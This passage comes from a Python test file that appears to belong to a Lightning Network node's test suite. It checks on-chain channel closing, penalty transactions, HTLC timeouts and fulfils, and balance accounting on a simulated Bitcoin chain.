rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_miner'], 'C'), ('cid1', ['penalty'], ['to_miner'], 'D')],
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And thord should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
# Passing the same tags in to the check again will verify that the
# txids 'unify' across both event sets (in other words, we're talking
# about the same tx's when we say 'A' in each
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_simple(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'F'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'F')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('external', ['to_them'], None, None)],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)],
'F': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('wallet', ['channel_close'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'D'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'D')],
'B': [('external', ['to_them'], None, None), ('wallet', ['channel_close'], None, None), ('cid1', ['htlc_fulfill'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
# l1 should wait til to_self_delay (10), then fulfill onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['htlc_timeout'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# FIXME: We can get warnings from unilteral changes, since we treat
# such errors a soft because LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# listfunds will show 1 output change, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.skip("Lisa, please fix this!")
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
